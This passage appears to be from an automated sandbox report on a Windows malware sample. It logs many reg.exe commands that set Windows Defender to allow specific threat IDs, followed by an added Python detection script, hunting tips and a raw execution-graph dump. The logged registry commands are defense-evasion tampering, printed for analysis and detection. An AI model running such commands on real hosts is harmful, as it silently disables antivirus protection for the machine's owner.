                            Programmed in:C, C++ or other language

                            Target ID:48
                            Start time:16:11:55
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:49
                            Start time:16:11:56
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:50
                            Start time:16:11:56
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:51
                            Start time:16:11:57
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:52
                            Start time:16:11:57
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:53
                            Start time:16:11:58
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:54
                            Start time:16:11:58
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

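The reg.exe records above are the interesting part of this process list: every one of them writes a value under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction, with the value name set to a Defender threat ID and the data set to 6, once for /reg:32 and once for /reg:64, and the earlier PowerShell batch chains dozens of the same REG ADD calls with ';' inside one -Command string before "gpupdate.exe /force" applies the policy. In that policy 6 is the documented code for Allow (1 Clean, 2 Quarantine, 3 Remove, 6 Allow, 8 UserDefined, 9 NoAction, 10 Block), so the sample is telling Defender to allow specific detections rather than disabling it outright. The following detection logic is an added example written for this page, not code from the report or from the sample: it parses process-creation command lines (the kind Sysmon event 1 or Security event 4688 provide), unescapes the \" quoting that a PowerShell -Command string carries, splits chained commands, and flags ThreatIDDefaultAction writes together with the gpupdate refresh. The input lines are copied from the process list above, except for a two-entry cut-down of the PowerShell batch and one constructed benign reg add used as a control; the names scan_command_lines, parse_reg_add and allowed_threat_ids are this example's own.

```python
"""Detection logic for the Defender threat-allow technique seen in the process
list above: 'REG ADD ... ThreatIDDefaultAction /v <threat ID> /d 6', repeated
for the /reg:32 and /reg:64 views, followed by 'gpupdate /force'.
Added example, not code from the report or the sample."""
import re

# Policy key the sample writes (hive alias and case normalised, no trailing '\')
POLICY_KEY = (r"hklm\software\policies\microsoft\windows defender"
              r"\threats\threatiddefaultaction")

# Action codes accepted by the ThreatIDDefaultAction policy (Defender CSP / GPO)
ACTION_NAMES = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                "8": "UserDefined", "9": "NoAction", "10": "Block"}

SEGMENT_SPLIT = re.compile(r"\s*(?:;|&&|\|\||&|\|)\s*")  # cmd/PowerShell chaining
REG_ADD = re.compile(r'(?i)(?:^|[\s"\\])reg(?:\.exe)?"?\s+add\s+(.*)$')
TOKEN = re.compile(r'"([^"]*)"|(\S+)')
GPUPDATE = re.compile(r'(?i)gpupdate(?:\.exe)?"?\s+.*?/force')


def _tokens(text):
    """Split a command tail into tokens, keeping quoted strings whole."""
    return [quoted or bare for quoted, bare in TOKEN.findall(text)]


def _normalise_key(key):
    key = key.strip().rstrip("\\").lower()
    key = re.sub(r"^hkey_local_machine", "hklm", key)
    return key.replace(r"\wow6432node", "")  # 32-bit view of the same key


def parse_reg_add(segment):
    """Parse one 'reg add' invocation into key/name/type/data/view, else None."""
    m = REG_ADD.search(segment)
    if not m:
        return None
    toks = _tokens(m.group(1))
    if not toks:
        return None
    rec = {"key": _normalise_key(toks[0]), "name": None, "type": None,
           "data": None, "view": "default"}
    flag_to_field = {"/v": "name", "/t": "type", "/d": "data"}
    i = 1
    while i < len(toks):
        low = toks[i].lower()
        if low in flag_to_field and i + 1 < len(toks):
            rec[flag_to_field[low]] = toks[i + 1]
            i += 2
            continue
        if low.startswith("/reg:"):      # /reg:32 or /reg:64 registry view
            rec["view"] = low[5:]
        i += 1
    return rec


def scan_command_lines(lines):
    """Return findings for ThreatIDDefaultAction writes and gpupdate /force."""
    findings = []
    for line in lines:
        # A PowerShell -Command string embeds \" escapes; unescape so the chained
        # REG ADD calls tokenize like plain cmd.exe lines, then split on chaining.
        cleaned = line.replace('\\"', '"')
        if GPUPDATE.search(cleaned):
            findings.append({"kind": "gpupdate_force", "raw": line})
        for seg in SEGMENT_SPLIT.split(cleaned):
            rec = parse_reg_add(seg)
            if rec is None or rec["key"] != POLICY_KEY:
                continue
            action = ACTION_NAMES.get((rec["data"] or "").strip(), "Unknown")
            kind = "defender_threat_allow" if action == "Allow" else "defender_threat_action"
            findings.append({"kind": kind, "threat_id": rec["name"],
                             "action": action, "view": rec["view"], "raw": line})
    return findings


def allowed_threat_ids(lines):
    """Threat IDs the host was told to Allow, deduplicated, numerically sorted."""
    ids = {f["threat_id"] for f in scan_command_lines(lines)
           if f["kind"] == "defender_threat_allow" and f["threat_id"]}
    return sorted(ids, key=int)


# Sample input: command lines copied from the process list above, a two-entry
# cut-down of the PowerShell batch (the report chains many more with ';'),
# and one constructed benign 'reg add' as a control.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r'"C:\Windows\system32\gpupdate.exe" /force',
    r'"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft'
    r'\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft'
    r'\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64',
    r'REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"'
    r' /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft'
    r'\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;',
    r'reg add "HKCU\Software\Example" /v Test /t REG_SZ /d 6 /f',  # constructed control
]

if __name__ == "__main__":
    for finding in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(finding)
```

Two practical notes. First, one command line can carry many writes (the PowerShell batch at the top of this page does), so alert on the set of distinct threat IDs per line rather than per reg.exe process, and resolve the IDs with Get-MpThreatCatalog on a Defender host to see which detections were whitelisted. Second, HKLM\SOFTWARE\Policies is one of the registry keys WOW64 does not redirect, so the paired /reg:32 and /reg:64 writes land on the same value; match on the key and the data 6 regardless of view. On a suspect host, "reg query" of the ThreatIDDefaultAction key showing values of 6 that no Group Policy object explains is the corresponding artefact to look for.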

                              Execution Graph

                              Execution Coverage:15.8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:2.3%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:44
                              execution_graph: [node/edge dump of the interactive graph omitted] API calls reachable in the graph: HeapCreate, HeapAlloc, HeapReAlloc, HeapFree, HeapDestroy, RtlAllocateHeap, RtlFreeHeap, VirtualAlloc, VirtualFree, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetVersion, GetVersionExA, GetCommandLineA, GetCommandLineW, GetStartupInfoA, GetModuleHandleA, GetModuleFileNameA, GetEnvironmentVariableA, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetStdHandle, GetFileType, SetHandleCount, WriteFile, LoadLibraryA, GetProcAddress, SetCurrentDirectoryA, ShellExecuteExA, WaitForSingleObject, CloseHandle, MessageBoxW, UnhandledExceptionFilter, ExitProcess
13418 417a07 13413->13418 13417 41589a 13416->13417 13417->13402 13420 417a1f 13418->13420 13422 417a4f 13420->13422 13427 4187a8 13420->13427 13421 4187a8 6 API calls 13421->13422 13422->13421 13423 417b78 13422->13423 13426 417a03 13422->13426 13431 41866d 13422->13431 13423->13426 13442 416eea 13423->13442 13426->13408 13428 4187c6 13427->13428 13429 4187ba 13427->13429 13445 418a6c 13428->13445 13429->13420 13432 418678 13431->13432 13433 41868b InterlockedIncrement 13431->13433 13432->13422 13434 4186b1 13433->13434 13435 4186a7 InterlockedDecrement 13433->13435 13457 4186dc 13434->13457 13436 41570a ctype 29 API calls 13435->13436 13436->13434 13439 4186d1 InterlockedDecrement 13439->13432 13440 4186c7 13463 41576b LeaveCriticalSection 13440->13463 13482 415523 GetLastError TlsGetValue 13442->13482 13444 416eef 13444->13426 13446 418ab5 13445->13446 13447 418a9d GetStringTypeW 13445->13447 13449 418ae0 GetStringTypeA 13446->13449 13450 418b04 13446->13450 13447->13446 13448 418ab9 GetStringTypeA 13447->13448 13448->13446 13451 418ba1 13448->13451 13449->13451 13450->13451 13453 418b1a MultiByteToWideChar 13450->13453 13451->13429 13453->13451 13454 418b3e ctype 13453->13454 13454->13451 13455 418b78 MultiByteToWideChar 13454->13455 13455->13451 13456 418b91 GetStringTypeW 13455->13456 13456->13451 13458 4186be 13457->13458 13459 418707 13457->13459 13458->13439 13458->13440 13460 418723 13459->13460 13461 4187a8 6 API calls 13459->13461 13460->13458 13464 41881d 13460->13464 13461->13460 13463->13432 13465 418869 13464->13465 13466 41884d LCMapStringW 13464->13466 13468 4188b2 LCMapStringA 13465->13468 13470 4188cf 13465->13470 13466->13465 13467 418871 LCMapStringA 13466->13467 13467->13465 13476 4189ab 13467->13476 13468->13476 13469 4188e5 MultiByteToWideChar 13471 41890f 13469->13471 13469->13476 13470->13469 13470->13476 13472 418945 MultiByteToWideChar 13471->13472 13471->13476 13473 41895e LCMapStringW 13472->13473 13472->13476 13474 418979 
13473->13474 13473->13476 13475 41897f 13474->13475 13478 4189bf 13474->13478 13475->13476 13477 41898d LCMapStringW 13475->13477 13476->13458 13477->13476 13478->13476 13479 4189f7 LCMapStringW 13478->13479 13479->13476 13480 418a0f WideCharToMultiByte 13479->13480 13480->13476 13483 41553f 13482->13483 13484 41557e SetLastError 13482->13484 13493 416efc 13483->13493 13484->13444 13487 415550 TlsSetValue 13488 415576 13487->13488 13489 415561 13487->13489 13490 414c0c ctype 7 API calls 13488->13490 13492 415567 GetCurrentThreadId 13489->13492 13491 41557d 13490->13491 13491->13484 13492->13484 13501 416f31 ctype 13493->13501 13494 415548 13494->13487 13494->13488 13495 416fe9 HeapAlloc 13495->13501 13496 41570a 29 API calls ctype 13496->13501 13497 415df1 ctype 5 API calls 13497->13501 13498 416894 ctype 6 API calls 13498->13501 13501->13494 13501->13495 13501->13496 13501->13497 13501->13498 13502 416f95 13501->13502 13505 41701e 13501->13505 13508 41576b LeaveCriticalSection 13502->13508 13504 416f9c 13504->13501 13509 41576b LeaveCriticalSection 13505->13509 13507 417025 13507->13501 13508->13504 13509->13507 13510->12992 13512 41821b 13511->13512 13513 418222 13511->13513 13515 417e3a 13512->13515 13513->13039 13516 41570a ctype 29 API calls 13515->13516 13517 417e4a 13516->13517 13526 417fe7 13517->13526 13519 417e61 13539 41576b LeaveCriticalSection 13519->13539 13522 417fdf 13522->13513 13524 417e86 GetCPInfo 13525 417e9c 13524->13525 13525->13519 13531 41808d GetCPInfo 13525->13531 13527 418007 13526->13527 13528 417ff7 GetOEMCP 13526->13528 13529 41800c GetACP 13527->13529 13530 417e52 13527->13530 13528->13527 13529->13530 13530->13519 13530->13524 13530->13525 13532 418178 13531->13532 13536 4180b0 13531->13536 13532->13519 13533 418a6c 6 API calls 13534 41812c 13533->13534 13535 41881d 9 API calls 13534->13535 13537 418150 13535->13537 13536->13533 13538 41881d 9 API calls 13537->13538 13538->13532 13539->13522 13541 40102d 13540->13541 13542 402170 
13541->13542 13543 402180 13542->13543 13544 401055 13542->13544 13545 403a76 30 API calls 13543->13545 13544->13068 13546 40218a 13545->13546 13546->13544 13547 403a9c ctype 29 API calls 13546->13547 13547->13544 13549 401c9e 13548->13549 13550 402170 30 API calls 13549->13550 13551 40109a 13550->13551 13552 4038ee 13551->13552 13557 4038f8 __EH_prolog 13552->13557 13553 4010ac 13562 403a9c 13553->13562 13554 40396d 13556 401e19 30 API calls 13554->13556 13555 401db8 30 API calls 13555->13557 13558 40397c 13556->13558 13557->13553 13557->13554 13557->13555 13559 401d7a 30 API calls 13558->13559 13560 403989 13559->13560 13561 403a9c ctype 29 API calls 13560->13561 13561->13553 13563 413f9f ctype 29 API calls 13562->13563 13564 4010b4 13563->13564 13564->13080 13566 4045ec __EH_prolog 13565->13566 13567 40460b GetModuleFileNameW 13566->13567 13568 40463f 13566->13568 13569 404625 13567->13569 13575 404637 13567->13575 13570 40243e 30 API calls 13568->13570 13573 401d1b 30 API calls 13569->13573 13569->13575 13572 404652 13570->13572 13571 4010d5 13585 40235e 13571->13585 13804 404598 GetModuleFileNameA 13572->13804 13573->13575 13575->13571 13577 40468e 13580 403a9c ctype 29 API calls 13577->13580 13578 404663 AreFileApisANSI 13808 403b9c 13578->13808 13580->13575 13582 401d7a 30 API calls 13583 404686 13582->13583 13584 403a9c ctype 29 API calls 13583->13584 13584->13577 13586 402368 __EH_prolog 13585->13586 13826 4025a3 13586->13826 13588 402377 13589 403a9c ctype 29 API calls 13588->13589 13590 4010dd 13589->13590 13591 402323 13590->13591 13592 40232d __EH_prolog 13591->13592 13593 4025a3 30 API calls 13592->13593 13594 40233c 13593->13594 13595 403a9c ctype 29 API calls 13594->13595 13596 4010e5 13595->13596 13596->13088 13840 40220e 13597->13840 13600 403b4f 13601 403b58 13600->13601 13602 403aa7 5 API calls ctype 13601->13602 13603 40110e 13601->13603 13602->13601 13603->13094 13605 40116c 13604->13605 13606 40244e 13604->13606 13610 401af4 13605->13610 
13607 403a76 30 API calls 13606->13607 13608 402455 13607->13608 13608->13605 13609 403a9c ctype 29 API calls 13608->13609 13609->13605 13611 401afe __EH_prolog 13610->13611 13853 405b6d 13611->13853 13613 401b30 13613->13105 13614 401b2c ctype 13614->13613 13614->13614 13856 405bca 13614->13856 13860 401ee5 13614->13860 13618 40243e 30 API calls 13617->13618 13619 4014c2 13618->13619 13620 405298 13619->13620 13621 401a2d 36 API calls 13620->13621 13622 4052a0 13621->13622 13924 4051c8 13622->13924 13626 413e65 ctype 29 API calls 13625->13626 13627 403a81 13626->13627 13628 403a9a 13627->13628 14026 413d3d RaiseException 13627->14026 13628->13157 13631 408111 __EH_prolog 13630->13631 13632 4042d6 ctype 34 API calls 13631->13632 13634 408120 13632->13634 13635 401d1b 30 API calls 13634->13635 13639 401526 13634->13639 14027 4081a8 13634->14027 14030 407f06 13634->14030 14057 408248 13634->14057 14065 402092 13634->14065 13635->13634 13639->13168 13639->13169 13641 403b9c 31 API calls 13640->13641 13642 40154c 13641->13642 13642->13181 13644 402f1f __EH_prolog 13643->13644 14143 403376 13644->14143 13647 401d7a 30 API calls 13648 402f53 13647->13648 13649 401d7a 30 API calls 13648->13649 13650 402f61 13649->13650 13651 403a76 30 API calls 13650->13651 13652 402f6b 13651->13652 13654 402f7e 13652->13654 14209 4034e3 13652->14209 13655 403037 13654->13655 13656 402f9a 13654->13656 14151 403113 13655->14151 14223 413220 13656->14223 13659 402fc2 13662 402fd5 13659->13662 13663 402fc8 13659->13663 13660 403042 13661 401d7a 30 API calls 13660->13661 13668 403050 13661->13668 13665 402170 30 API calls 13662->13665 14229 4131e0 13663->14229 13666 402fe8 13665->13666 13670 40602f 33 API calls 13666->13670 13667 403065 14199 40348a 13667->14199 13668->13667 13671 401d7a 30 API calls 13668->13671 13672 402ff7 13670->13672 13671->13667 13674 401d7a 30 API calls 13672->13674 13676 403004 13674->13676 13677 403a9c ctype 29 API calls 13676->13677 13678 403010 13677->13678 14233 
40309d 13678->14233 13680 403021 13681 403a9c ctype 29 API calls 13680->13681 13682 403029 13681->13682 13683 4131e0 ctype 2 API calls 13682->13683 13684 403035 13683->13684 13684->13660 13686 405041 13685->13686 13687 405047 GetCurrentDirectoryA 13685->13687 13688 40243e 30 API calls 13686->13688 13689 405059 13687->13689 13688->13687 13689->13220 13691 402170 30 API calls 13690->13691 13692 401796 13691->13692 13693 405d0b 13692->13693 13694 40179e 13693->13694 13695 405d16 13693->13695 13694->13266 13695->13694 13696 401db8 30 API calls 13695->13696 13696->13694 13698 4017bb 13697->13698 13699 401e69 13697->13699 13698->13294 13699->13698 15872 402399 13699->15872 13702 40263e __EH_prolog 13701->13702 13703 401ce1 30 API calls 13702->13703 13704 402651 13703->13704 13705 401de3 30 API calls 13704->13705 13706 402660 13705->13706 13707 401ce1 30 API calls 13706->13707 13708 40266b 13707->13708 13715 40220e 30 API calls 13714->13715 13716 401138 13715->13716 13717 401d7a 13716->13717 13718 401d98 13717->13718 13719 401d86 13717->13719 13718->13106 13720 402170 30 API calls 13719->13720 13720->13718 13721->13110 13723 403d64 __EH_prolog 13722->13723 13724 4042d6 ctype 34 API calls 13723->13724 13737 403d75 13724->13737 13725 4011f5 13725->13137 13725->13138 13726 402ee1 30 API calls 13726->13737 13728 403eec 13729 403a9c ctype 29 API calls 13728->13729 13730 403ef4 13729->13730 13731 403a9c ctype 29 API calls 13730->13731 13732 403efc 13731->13732 13733 403a9c ctype 29 API calls 13732->13733 13733->13725 13734 40243e 30 API calls 13734->13737 13735 403f09 13736 403a9c ctype 29 API calls 13735->13736 13738 403f11 13736->13738 13737->13725 13737->13726 13737->13728 13737->13734 13737->13735 13739 40411f 30 API calls 13737->13739 13742 401ee5 30 API calls 13737->13742 13747 403a9c 29 API calls ctype 13737->13747 15880 403f3c 13737->15880 15890 4040be 13737->15890 15900 40213f 13737->15900 13740 403a9c ctype 29 API calls 13738->13740 13739->13737 13741 403f19 
13740->13741 13744 403a9c ctype 29 API calls 13741->13744 13742->13737 13745 403f21 13744->13745 13746 403a9c ctype 29 API calls 13745->13746 13746->13725 13747->13737 13749->13139 13751 40408b 13750->13751 13752 4040a5 13751->13752 13753 40408f 13751->13753 13755 401ce1 30 API calls 13752->13755 13754 402170 30 API calls 13753->13754 13756 401231 13754->13756 13755->13756 13756->13156 13758 4042eb ctype 34 API calls 13757->13758 13759 401344 13758->13759 13760 4042ad 13759->13760 13761 4042b8 13760->13761 13762 4042d6 ctype 34 API calls 13761->13762 13763 4042c0 13762->13763 13764 403a9c ctype 29 API calls 13763->13764 13765 4042c8 13764->13765 13765->13159 13766->13141 13767->13141 15905 405f5e 13768->15905 13772 4021c4 30 API calls 13771->13772 13773 401df3 13772->13773 13773->13245 13774->13272 13776 401d38 13775->13776 13777 402170 30 API calls 13776->13777 13778 40173e 13777->13778 13778->13254 13780 405886 __EH_prolog 13779->13780 13781 404d51 30 API calls 13780->13781 13782 405895 13781->13782 13783 405806 32 API calls 13782->13783 13784 4058a2 13783->13784 13785 403a9c ctype 29 API calls 13784->13785 13786 401753 13785->13786 13786->13282 13787->13304 13789 4021c4 30 API calls 13788->13789 13790 401805 13789->13790 13790->13346 13800 401a35 13799->13800 13801 401a39 13799->13801 13800->13236 15967 404c4a 13801->15967 13805 4045c7 13804->13805 13806 4045d9 13804->13806 13805->13806 13821 4046ab 13805->13821 13806->13577 13806->13578 13809 403ba6 __EH_prolog 13808->13809 13810 402170 30 API calls 13809->13810 13814 403bc9 13810->13814 13811 403c10 13812 401ce1 30 API calls 13811->13812 13815 403c26 13812->13815 13813 403be1 MultiByteToWideChar 13813->13811 13817 403bfb 13813->13817 13814->13811 13814->13813 13816 402170 30 API calls 13814->13816 13818 403a9c ctype 29 API calls 13815->13818 13816->13813 13825 413d3d RaiseException 13817->13825 13820 403c2e 13818->13820 13820->13582 13822 4046c1 13821->13822 13822->13822 13823 40243e 30 API calls 13822->13823 
13824 4046d0 13823->13824 13824->13806 13825->13811 13827 4025ad __EH_prolog 13826->13827 13828 402170 30 API calls 13827->13828 13829 4025c9 13828->13829 13830 401db8 30 API calls 13829->13830 13831 4025d6 13830->13831 13832 401db8 30 API calls 13831->13832 13833 4025e0 13832->13833 13834 401db8 30 API calls 13833->13834 13835 4025ea 13834->13835 13836 401ce1 30 API calls 13835->13836 13837 4025f6 13836->13837 13838 403a9c ctype 29 API calls 13837->13838 13839 4025fe 13838->13839 13839->13588 13842 402218 __EH_prolog 13840->13842 13841 40224c 13844 402170 30 API calls 13841->13844 13842->13841 13843 402241 13842->13843 13845 401ce1 30 API calls 13843->13845 13846 40225f 13844->13846 13852 401105 13845->13852 13847 402170 30 API calls 13846->13847 13848 40226c 13847->13848 13849 401ce1 30 API calls 13848->13849 13850 4022a0 13849->13850 13851 403a9c ctype 29 API calls 13850->13851 13851->13852 13852->13600 13863 405b4c 13853->13863 13859 405bd7 13856->13859 13858 405c03 13858->13614 13859->13858 13915 405ba8 13859->13915 13920 40248c 13860->13920 13866 405b2f 13863->13866 13869 4059b3 13866->13869 13870 4059bd __EH_prolog 13869->13870 13871 405a25 13870->13871 13872 4059ce 13870->13872 13887 405a63 13871->13887 13874 401c80 30 API calls 13872->13874 13876 4059d9 AreFileApisANSI 13874->13876 13890 403d04 13876->13890 13877 405a30 CreateFileW 13878 405a53 13877->13878 13878->13614 13883 403a9c ctype 29 API calls 13884 405a17 13883->13884 13885 403a9c ctype 29 API calls 13884->13885 13886 405a1f 13885->13886 13886->13878 13888 405a6d FindCloseChangeNotification 13887->13888 13889 405a2c 13887->13889 13888->13889 13889->13877 13889->13878 13898 403c43 13890->13898 13893 40597a 13894 405a63 FindCloseChangeNotification 13893->13894 13895 405985 13894->13895 13896 405989 CreateFileA 13895->13896 13897 4059ae 13895->13897 13896->13897 13897->13883 13899 403c4d __EH_prolog 13898->13899 13900 40243e 30 API calls 13899->13900 13902 403c6f 13900->13902 13901 403cd3 13912 
403d24 13901->13912 13902->13901 13903 403c90 WideCharToMultiByte 13902->13903 13905 40243e 30 API calls 13902->13905 13903->13901 13906 403cbe 13903->13906 13905->13903 13911 413d3d RaiseException 13906->13911 13909 403a9c ctype 29 API calls 13910 403cf0 13909->13910 13910->13893 13911->13901 13913 40243e 30 API calls 13912->13913 13914 403ce8 13913->13914 13914->13909 13916 405bb5 13915->13916 13919 405b7b ReadFile 13916->13919 13918 405bc6 13918->13859 13919->13918 13921 401eef 13920->13921 13922 4024a0 13920->13922 13921->13614 13923 40243e 30 API calls 13922->13923 13923->13921 13925 4051d2 __EH_prolog 13924->13925 13940 405268 13925->13940 13928 405243 13966 4051a4 13928->13966 13929 4051a4 SetFileAttributesA DeleteFileA 13931 4051e3 13929->13931 13931->13928 13931->13929 13934 4014d3 13931->13934 13935 403a9c ctype 29 API calls 13931->13935 13938 405268 30 API calls 13931->13938 13939 40522c GetLastError 13931->13939 13943 40511b 13931->13943 13957 4058cd 13931->13957 13965 40498d CreateDirectoryA 13931->13965 13932 40524b 13933 403a9c ctype 29 API calls 13932->13933 13933->13934 13934->13135 13934->13136 13935->13931 13938->13931 13939->13931 13939->13934 13941 40243e 30 API calls 13940->13941 13942 405281 13941->13942 13942->13931 13944 405125 __EH_prolog 13943->13944 13945 40243e 30 API calls 13944->13945 13946 405141 13945->13946 13971 40506f 13946->13971 13948 40514c 13956 405164 13948->13956 13976 4050e5 13948->13976 13949 403a9c ctype 29 API calls 13951 405191 13949->13951 13951->13931 13954 405170 13955 4050e5 33 API calls 13954->13955 13954->13956 13955->13956 13956->13949 13958 4058d7 __EH_prolog 13957->13958 13997 404d51 13958->13997 13963 403a9c ctype 29 API calls 13964 4058fd 13963->13964 13964->13931 13965->13931 13967 4051b0 13966->13967 13968 4051ac 13966->13968 14020 404bdc 13967->14020 13968->13932 13970 4051b8 13970->13932 13972 405083 GetTempPathA 13971->13972 13973 40507d 13971->13973 13975 405095 13972->13975 13974 40243e 30 API calls 
13973->13974 13974->13972 13975->13948 13977 4051a4 2 API calls 13976->13977 13978 4050ee 13977->13978 13988 4050ab 13978->13988 13980 4050ff 13981 405111 13980->13981 13993 4052f9 13980->13993 13981->13956 13983 4047db 13981->13983 13984 4047e9 13983->13984 13985 4047ef GetWindowsDirectoryA 13983->13985 13987 40243e 30 API calls 13984->13987 13986 404802 13985->13986 13986->13954 13987->13985 13989 4050c0 13988->13989 13990 4050c8 GetTempFileNameA 13988->13990 13991 40243e 30 API calls 13989->13991 13992 4050dd 13990->13992 13991->13990 13992->13980 13994 405305 13993->13994 13996 405316 13993->13996 13995 40243e 30 API calls 13994->13995 13995->13996 13996->13981 13998 40243e 30 API calls 13997->13998 13999 404d68 13998->13999 14000 405806 13999->14000 14001 405810 __EH_prolog 14000->14001 14006 40553a 14001->14006 14007 40551a FindClose 14006->14007 14008 40554b 14007->14008 14009 405566 14008->14009 14010 40554f FindFirstFileA 14008->14010 14013 40551a 14009->14013 14010->14009 14011 40556a 14010->14011 14016 40557f 14011->14016 14014 405524 FindClose 14013->14014 14015 40552f 14013->14015 14014->14015 14015->13963 14017 4055bd 14016->14017 14018 4046ab 30 API calls 14017->14018 14019 4055da 14018->14019 14019->14009 14025 40489c SetFileAttributesA 14020->14025 14022 404be6 14023 404bea 14022->14023 14024 404bec DeleteFileA 14022->14024 14023->13970 14024->13970 14025->14022 14026->13628 14028 402170 30 API calls 14027->14028 14029 4081c8 14028->14029 14029->13634 14031 407f10 __EH_prolog 14030->14031 14032 407f67 14031->14032 14033 401c80 30 API calls 14031->14033 14035 401c80 30 API calls 14032->14035 14055 407f93 14032->14055 14034 407f4c 14033->14034 14073 408062 14034->14073 14039 407f78 14035->14039 14036 408018 14038 4042d6 ctype 34 API calls 14036->14038 14041 408027 14038->14041 14042 408062 35 API calls 14039->14042 14044 4042ad ctype 34 API calls 14041->14044 14045 407f87 14042->14045 14043 403a9c ctype 29 API calls 14043->14032 14047 408033 
14044->14047 14048 403a9c ctype 29 API calls 14045->14048 14046 402ee1 30 API calls 14046->14055 14049 4042d6 ctype 34 API calls 14047->14049 14048->14055 14050 408045 14049->14050 14051 4042ad ctype 34 API calls 14050->14051 14052 408051 14051->14052 14052->13634 14053 401d7a 30 API calls 14053->14055 14055->14036 14055->14046 14055->14053 14056 403a9c 29 API calls ctype 14055->14056 14086 4081e7 14055->14086 14056->14055 14058 408252 __EH_prolog 14057->14058 14059 403a76 30 API calls 14058->14059 14060 40825d 14059->14060 14061 408274 14060->14061 14126 40828f 14060->14126 14063 4039df 30 API calls 14061->14063 14064 408280 14063->14064 14064->13634 14066 40209c __EH_prolog 14065->14066 14067 4042d6 ctype 34 API calls 14066->14067 14068 4020c0 14067->14068 14069 4042ad ctype 34 API calls 14068->14069 14070 4020cb 14069->14070 14071 403a9c ctype 29 API calls 14070->14071 14072 4020d3 14071->14072 14072->13634 14074 40806c __EH_prolog 14073->14074 14075 4042d6 ctype 34 API calls 14074->14075 14076 40807e 14075->14076 14077 402170 30 API calls 14076->14077 14078 408093 14077->14078 14079 4080ef 14078->14079 14081 4080de 14078->14081 14083 401db8 30 API calls 14078->14083 14096 403998 14078->14096 14080 403a9c ctype 29 API calls 14079->14080 14082 407f5b 14080->14082 14081->14079 14084 